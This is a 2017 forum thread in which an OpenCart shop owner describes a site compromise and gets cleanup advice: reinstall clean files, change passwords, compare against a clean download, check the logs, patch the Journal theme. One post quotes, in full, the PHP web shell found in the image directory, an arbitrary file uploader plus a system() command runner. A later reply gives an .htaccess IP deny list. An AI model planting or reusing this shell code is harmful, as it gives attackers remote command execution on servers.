Post by stinn » Fri May 12, 2017 3:47 am

Last night it appears that an IP from Europe began to attack my OC2.3.0.2 install. It appears they may have accessed the admin side the admin password has been changed.
The next standout from the logs is a file called index.php showing up in the images directory:

Code: Select all

94.242.252.39 - - [11/May/2017:00:59:49 -0400] "GET /image/data/atlarge/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
This file contained an uploader, that looks like this:

Code: Select all

<?php
if(@$_REQUEST["id"]== 'jj')
{
$files = @$_FILES["files"];
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)){
echo "<h1><a href='$fullpath'>shell</a></h1>";
}
}
exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
}
if(@$_REQUEST["id"]== 'pp')
{
system($_GET["cmd"]);
}
?>
There is then a post to this

Code: Select all

94.242.252.39 - - [11/May/2017:01:00:08 -0400] "POST /image/data/atlarge/index.php?id=jj HTTP/1.1" 200 190 "https://www.xxx.ca/image/data/atlarge/index.php?id=jj" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
Which seems to have created web.php as we start to see hits to that now

Code: Select all

94.242.252.39 - - [11/May/2017:01:00:14 -0400] "GET /image/data/atlarge/web.php HTTP/1.1" 200 40459 "https://www.xxx.ca/image/data/atlarge/index.php?id=jj" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=smiley HTTP/1.1" 200 92 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=folder HTTP/1.1" 200 90 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=file HTTP/1.1" 200 93 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
web.php file is nowhere to be found on the server. The first thing I noticed this morning was that the site was not working, the front end was throwing 500 errors, the backend was working normally. I found that a large number of files had been deleted, before I realized there was an exploit, and re-uploading from a fresh download + journal theme upload seemed to get the site up and running.
However that's when I started combing throught the logs and found all this and put the site in maintenance mode. Any advice on how to get the site up and running securely again? I'm thinking obviously fresh file install, what's the best way to do that with the database? Can I just dump the fresh download and replace the config files? This clearly attacked my images dir but I need those, I've searched through the directory and find no more .php files in it.

Thanks in advance for any advice or guidance.
Last edited by stinn on Sun Feb 19, 2023 9:46 am, edited 2 times in total.

Newbie

Posts

Joined
Mon Feb 15, 2010 10:08 am

Post by IP_CAM » Fri May 12, 2017 7:37 am

well, one would have to find out first on how they got in, in the first place. And for this, your Server Setup and Logs,
to some time back, would have to be screened, as well as your Shop Installation, Files, Extensions, and Settings,
because they must have found a way in.

Or then, your own Software has sent them the Key, but such could only happen, if the Key would already have been
part of the Software, and this can only happen, if one installed a Theme from the wrong Lower East Site of the web ::)
---
And if you use a Journal Theme Extension, you should upgrade, they just had some problems, a short while ago... ;)
I would get a DB Content Copy, to check on it, and delete/remove the existing Shop Directory, in FULL, to later
CREATE a new one. Then start again from upload + install, until everything works, and then, restore existing data,
after the DB-Screen, back to it's DB Place.

Good Luck !
Ernie
Last edited by IP_CAM on Fri May 12, 2017 7:45 am, edited 3 times in total.

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by stinn » Fri May 12, 2017 7:40 am

I was running an old version of journal and I wonder if that's what did it they seemed to be hitting some journal js files. I have fully updated it now and fresh installed all files only reusing images after going through all folders to ensure no shenanigans.

Newbie

Posts

Joined
Mon Feb 15, 2010 10:08 am

Post by ADD Creative » Fri May 12, 2017 7:40 pm

There has been a recent exploit with the Journal Theme. See viewtopic.php?f=179&t=183812. The last post suggested they have released a patch.

I would recommend you change the passwords to all the OpenCart admin accounts and to all FTP accounts. Remove all the PHP files from your image directory.

I would compare the files on your server with a clean install downloads for the OpenCart site to see if any changes have been made. Download the files and use a file comparison program to compare.

I would also look through the web logs and the FTP logs to see if you can work out how the /image/data/atlarge/index.php got on your server. Search for if in your logs or any other access from the same IP.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by stinn » Fri May 12, 2017 10:39 pm

Passwords have all been changed. I completely replaced my html folder with a fresh download from the site, then copied the newest journal theme, then fresh downloaded all my extensions. The only files I moved from my older folder were images and that was after explicitly looking through all the folders for any php files. I'm fairly confident I'm clean now.
I'm going to continue to search through the logs to see if I can track down how or when that file was created but nothing stood out yesterday. It's also possible it happened a while ago and I'll need to go back in older logs.

Newbie

Posts

Joined
Mon Feb 15, 2010 10:08 am

Post by IP_CAM » Sat May 13, 2017 12:17 am

And just, to round this up, and under the aspect, that my Servers momentarely get 'bombed'
on a daily scale, some of them also looking for Magento related leaks and holes. And in some
Countries, even Hospitals are out of order, because of the present attacks, all over the place.
---
My favoured Tool to check on IP's:
https://www.gaijin.at/en/dlet.php
---
Whoever is not required, to leave a Site 'open' for anyone, could always restrict access in a 'global'
way, by use of a SITE ROOT .htaccess, to deny entire Ranges, instead of (changing) IP-Adresses
only, from those, trying to sneak in the wrong way, or do bad things.
It's one of those steps, hopefully adding a little to security...
Ernie

PS: On my commercial Clubs Sites, this list already contains 1140 such entries, out of a total
of 1819 htaccess Lines, after beeing in service for well over a decade, it was the only way,
to keep it clean. ;) Still, it had no negative effect on any page load Test Result.
---
my latest List of denials, just re-updated, attempted WP Hacks, saturday 0400:

Code: Select all

Options +SymLinksIfOwnerMatch
SetEnvIfNoCase User-Agent "^Wget" bad_bot
<Limit GET POST>
   Order Allow,Deny
   Allow from all
   Deny from env=bad_bot
</Limit>
# Prevent Directory listing 
Options -Indexes
<Files *>
order allow,deny
allow from all
deny from 5.77.34.
deny from 37.59.
deny from 37.128.
deny from 46.161.
deny from 46.229.
deny from 47.90.
deny from 50.63.
deny from 51.255.
deny from 63.243.
deny from 66.148.
deny from 69.49.
deny from 77.244.
deny from 80.82.
deny from 80.92.
deny from 80.190.
deny from 83.18.
deny from 88.76.
deny from 88.86.
deny from 91.121.
deny from 92.
deny from 93.104.
deny from 94.23.
deny from 94.177.
deny from 94.242.
deny from 98.124.
deny from 98.130. 
deny from 98.131.
deny from 103.27.
deny from 108.167.
deny from 113.10.
deny from 125.
deny from 141.105.
deny from 145.87.
deny from 148.251.
deny from 149.56.
deny from 149.202.
deny from 149.255.
deny from 151.13.
deny from 163.172.
deny from 164.132.
deny from 168.144.
deny from 174.37.
deny from 178.250.
deny from 180.76.
deny from 182.50.
deny from 184.168.
deny from 184.172.
deny from 185.147.
deny from 188.234.
deny from 198.1.
deny from 198.2.
deny from 198.12.
deny from 200.9.
deny from 200.21.
deny from 200.75.
deny from 202.46.
deny from 203.124.
deny from 204.93.
deny from 213.251.
deny from 216.244.
deny from 217.28.
</Files>

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland
Who is online

Users browsing this forum: No registered users and 38 guests